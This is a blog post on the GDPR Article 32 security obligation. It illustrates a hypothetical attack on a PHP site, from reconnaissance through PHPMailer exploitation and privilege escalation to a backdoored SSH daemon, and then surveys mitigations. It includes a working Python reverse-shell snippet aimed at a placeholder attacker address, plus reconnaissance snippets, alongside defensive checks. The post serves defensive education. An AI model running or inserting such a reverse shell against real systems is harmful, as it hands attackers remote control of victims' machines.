A scan of the property “sitewards.com” via Nmap.

On the obligation under the GDPR to handle data “safely”

Andrew Howden
Published in Y1 Digital
Jun 17, 2018


With the introduction of the GDPR (the “General Data Protection Regulation”) across the EU, companies are under an increased burden to demonstrate they are handling personal data in a safe and secure manner. The GDPR defines two roles for data handling:

  • Controller, who is responsible for obtaining the data lawfully
  • Processor, who is responsible for processing the data on behalf of the controller

All companies who handle data are at least processors, and may also be controllers. Both are responsible for the safety of this data. Specifically, the GDPR says the following:

Taking into account the state of the art, the costs of implementation and the nature, scope, context and purposes of processing as well as the risk of varying likelihood and severity for the rights and freedoms of natural persons, the controller and the processor shall implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk. — GDPR, Article 32

In addition, it lays out penalties for violating the above condition:

Infringements of the following provisions shall, in accordance with paragraph 2, be subject to administrative fines up to 10 000 000 EUR, or in the case of an undertaking, up to 2 % of the total worldwide annual turnover of the preceding financial year, whichever is higher:

the obligations of the controller and the processor pursuant to Articles 8, 11, 25 to 39 and 42 and 43. — GDPR, Article 83

Given this, we can allocate some monetary value to violating the above standards. In addition, we can assign a cost to a data breach even prior to the new fines applicable under the GDPR, thanks to IBM’s “Cost of Data Breach” study:

This year’s study reports the global average cost of a data breach is down 10 percent over previous years to $3.62 million. The average cost for each lost or stolen record containing sensitive and confidential information also significantly decreased from $158 in 2016 to $141 in this year’s study.

So, given some back-of-the-envelope maths, we can determine that a data breach is expected to cost somewhere between 3 and 13 million USD, depending on the severity of the breach, the cost of litigation and so on: the average breach cost alone sits at the low end, and the average cost plus the maximum fine sits at the high end.
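To make that range concrete, here is the arithmetic as a tiny Python sketch, treating the euro as roughly at parity with the dollar (an assumption made purely to keep the numbers simple):

    # Back-of-the-envelope breach cost, using the figures quoted above.
    AVERAGE_BREACH_COST = 3.62e6  # IBM's 2017 global average, in USD
    MAXIMUM_FINE = 10e6           # GDPR Article 83(4) cap; EUR ~ USD assumed

    low_end = AVERAGE_BREACH_COST                  # a breach with no fine
    high_end = AVERAGE_BREACH_COST + MAXIMUM_FINE  # a breach plus the maximum fine

    print(f"~${low_end / 1e6:.1f}M to ~${high_end / 1e6:.1f}M")
    # prints: ~$3.6M to ~$13.6M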

Anatomy of a hack

To understand the risk we are offsetting, we first need to examine what we are protecting against, and determine in what ways we can make it more difficult to use our services in an unauthorised way.

To do this, we’ll quickly review how a potential hacker can probe and exploit an environment.

Discovery

In any structured attack, the first step in determining how to exploit a service is understanding what that service is. There are many tools that automate this process, making it fairly easy for a semi-skilled attacker to get a good picture of what a service provides.

Let’s pretend our hacker has visited our site and looked at the HTTP response headers, spotting the X-Powered-By header that PHP emits by default. Understanding that this is a PHP website, and being knowledgeable about the class of exploits common to PHP, the hacker starts looking for command injection through the PHP mail function. The hacker sees a contact form, which in most systems simply forwards requests via email to a given user.
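What this discovery step looks like in practice can be sketched in a few lines of Python; the URL below is a placeholder, and requests is a third-party HTTP library:

    # Fetch a page and inspect the response headers for technology
    # fingerprints. The target URL is a placeholder.
    import requests

    response = requests.get("https://www.example.com/", timeout=10)

    # Headers such as X-Powered-By and Server often leak the stack in use.
    for header in ("X-Powered-By", "Server"):
        if header in response.headers:
            print(f"{header}: {response.headers[header]}")

    # A value such as "X-Powered-By: PHP/5.6.30" tells an attacker exactly
    # which class of exploits is worth trying first.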

Exploitation

Unfortunately, our pretend application uses the PHP library “PHPMailer”. This popular library is used to send email to users for all sorts of reasons, but older versions include a vulnerability (CVE-2016-10033, fixed in release 5.2.18) that allows the hacker to execute code on the system.

The hacker then attempts to use this publicly available exploit against the system, and to their delight it works — the hacker is able to issue arbitrary instructions in a limited way to the service.
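The defensive counterpart to this step is cheap: check the dependency manifest for known-vulnerable versions. Here is a minimal sketch, assuming a Composer-based project and using the 5.2.18 fix version of CVE-2016-10033 as the threshold; dedicated dependency scanners do this far more thoroughly:

    # Flag a vulnerable PHPMailer version listed in composer.lock.
    import json

    FIXED_VERSION = (5, 2, 18)  # CVE-2016-10033 was fixed in 5.2.18

    with open("composer.lock") as f:
        lock = json.load(f)

    for package in lock.get("packages", []):
        if package["name"] == "phpmailer/phpmailer":
            version = tuple(int(part) for part in
                            package["version"].lstrip("v").split(".")[:3])
            if version < FIXED_VERSION:
                print(f"VULNERABLE: phpmailer {package['version']} < 5.2.18")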

Persistence

Though our hacker is now able to make the machine do something akin to what they want, they have only a limited window in which to further investigate and exploit the system. It is possible that a knowledgeable developer closes this hole in the next patch cycle, or that the execution of these commands is detected by software designed to catch this type of exploitation.

Accordingly, the hacker needs to establish persistence. Our hacker is likely to use the previous vulnerability to instruct the machine to connect back to a service that the hacker controls, allowing further access to the machine in a much simpler way (a “reverse shell”).
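To make the idea concrete, a reverse shell can be as small as the following sketch: the compromised machine dials out to a listener the hacker controls and attaches a shell to that socket. The address and port are placeholders, and because the connection originates from inside the network it passes through firewalls that only filter inbound traffic:

    # A minimal reverse shell sketch: connect *out* to the attacker's
    # listener and wire a shell to the socket. The address and port are
    # placeholders for illustration only.
    import os
    import socket
    import subprocess

    ATTACKER = ("203.0.113.10", 4444)  # hypothetical attacker-controlled listener

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(ATTACKER)

    # Point stdin, stdout and stderr at the socket, then hand over a shell.
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    subprocess.call(["/bin/sh", "-i"])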

Once this access has been established, the hacker will begin looking around for a way to escalate privileges and establish persistence. Our hacker has been keeping a close eye on the CVE feeds and knows there is a kernel exploit called “dirty c0w” (CVE-2016-5195) which reliably allows escalation to administrative privileges on the machine.

Our hacker transfers this exploit to the machine and runs it, gaining administrative privileges. They then install a modified version of the SSH daemon that allows them persistent, unlogged access, and modify the system to hide other traces of their presence.
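This is precisely the kind of tampering that file-integrity monitoring catches. A minimal sketch of the idea, assuming a known-good hash was recorded when the host was built; real tools such as AIDE or Tripwire maintain a full database of these:

    # Compare the running sshd binary against its install-time hash.
    import hashlib

    SSHD_PATH = "/usr/sbin/sshd"
    KNOWN_GOOD_SHA256 = "..."  # placeholder: recorded when the host was built

    def sha256_of(path: str) -> str:
        digest = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                digest.update(chunk)
        return digest.hexdigest()

    if sha256_of(SSHD_PATH) != KNOWN_GOOD_SHA256:
        print(f"ALERT: {SSHD_PATH} no longer matches its install-time hash")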

Monetisation

Finally, now that our hacker has a persistent foothold on our network, they will begin to look for ways to monetise the information they are able to retrieve. There are many ways to do this:

  • Sell stolen records of personal data
  • Encrypt the data, and ransom back the keys to the business owners
  • Sell intellectual property found on this machine to competing services
  • Install additional software on this machine that makes it part of a “bot net” used to conduct further attacks

A level of security appropriate to the risk

In the above case this would be a total compromise, and we would be required to report the breach both to the supervisory authorities under the GDPR and directly to users themselves. Users would then be able to sue for damages on the grounds that their private information was accessed without their consent. The authority responsible for information privacy would also likely issue fines against us, as we were unable to meet our duty of care and safely protect user data.

However, there are many things we can do to dramatically reduce the risk of the above exposure. Gaining unauthorised access to services is not a simple task, and we can make gaining this access an extremely expensive undertaking. Unfortunately, there are few ways to “guarantee” that a system is safe, but we can make attacks cost-prohibitive, such that attackers will not invest the time and resources required to gain this level of access.

Risk analysis by direct testing

The best way to determine where to invest our cash is to have someone attempt to break into our services on our behalf. This service, called “pentesting” or “red teaming”, contracts professional (but friendly) hackers to break into our service, document the mechanisms they used to discover and exploit it, and provide recommendations as to how these issues can be resolved. These people can be contracted directly through pentesting companies, or crowd-sourced through bug bounty programs.

A lower-cost alternative is to use software to automate some of the analysis of systems that humans would otherwise perform. This is much cheaper, but sees only the limited slice of the problem configured by the software implementer. Because hacking is an inherently creative process, software can capture a number of the more obvious faults, but it is not a suitable replacement for a human operator.
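As a sketch of what such automation looks like, the scan pictured at the top of this article can be driven from a few lines of Python. This assumes nmap is installed, and the target shown is one the Nmap project explicitly permits scanning; only ever scan hosts you are authorised to test:

    # Run a service/version scan and report what a host exposes.
    import subprocess

    TARGET = "scanme.nmap.org"  # a host the Nmap project allows scanning

    result = subprocess.run(
        ["nmap", "-sV", "--top-ports", "100", TARGET],
        capture_output=True,
        text=True,
        check=True,
    )
    print(result.stdout)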

Risk analysis by threat modelling

Unfortunately, the services above can be cost-prohibitive and are inherently point-in-time: new vulnerabilities will be introduced and others closed up as we continue to revise our software.

Instead, it is perhaps better to analyse how other companies have been compromised, and examine whether our software suffers from similar classes of issues.

There are a number of mechanisms to help profile our software against that of others, but perhaps the simplest is to look for public “incident response” reports, in which companies that have been hacked publish an investigation into the causes of the hack and how those risks can be reduced.

In many cases there are common themes that run through breached companies, such as:

  • Poor access management controls
  • Unpatched or legacy software
  • No tooling to catch and remediate unauthorised use
  • No procedure for reporting vulnerabilities

Because these patterns are so common, there are standards designed to provide some guidance as to the most common risks and how to reduce them. Some examples include:

  • The OWASP “Top Ten” list of web application security risks
  • The CIS benchmarks and controls
  • ISO/IEC 27001

Implementing these standards directly or using them as a base from which to model the security of our applications may be one way to reduce the level of investigatory work required to evaluate risks.

Risks mitigated

By undertaking the above analysis prior to the hack, we would have been able to heavily mitigate our hacker’s ability to access our systems. Specifically, we would be:

  • Denying them initial access by ensuring PHPMailer was up to date
  • Catching them by alerting when the expected behaviour of the application was violated
  • Preventing them from gaining administrative privileges by ensuring the operating system was up to date
  • Catching the persistence attempts by detecting unusual system behaviour

Thus we would have prevented unauthorised access to the data and removed the ability to monetise that access.
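The last two points, detecting unusual behaviour, are exactly how the reverse shell above would surface. A minimal sketch of the idea follows; the port allowlist is a hypothetical egress policy, psutil is a third-party package, and real deployments use egress firewalls and intrusion detection tooling rather than a script:

    # Flag established outbound TCP connections to unexpected remote ports.
    import psutil

    SERVICE_PORTS = {22, 80, 443}         # ports this host serves on (inbound)
    ALLOWED_REMOTE_PORTS = {53, 80, 443}  # hypothetical egress policy

    for conn in psutil.net_connections(kind="tcp"):
        if conn.status != psutil.CONN_ESTABLISHED or not conn.raddr:
            continue
        # Inbound clients connect *to* our service ports from ephemeral
        # remote ports; skip those and look only at traffic we originated.
        if conn.laddr.port in SERVICE_PORTS:
            continue
        if conn.raddr.port not in ALLOWED_REMOTE_PORTS:
            print(f"ALERT: unexpected outbound connection to "
                  f"{conn.raddr.ip}:{conn.raddr.port} (pid {conn.pid})")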

In Conclusion

The GDPR introduces new requirements around the unauthorised access of personal data. These requirements will increase both the cost and consequences of a hack, and may result in fines being levied directly against the organisation.

Unfortunately, there is no guarantee of data safety. However, we can take a measured approach to evaluating the risks to our business against the costs to remediate certain issues, and proactively reduce our exposure to both these fines and consumer action.

Additional Reading

If this topic piqued your interest and you’d like to look into it further, please see the following documentation:

Thanks

  • Both the team at Sitewards and their clients, whose conversations inspired this post.
  • Daniel Fahlke, Aarion Bonner and Francis M. Gallagher for early review and feedback.
  • Anton Siniorg, whose discussion prompted further thought.
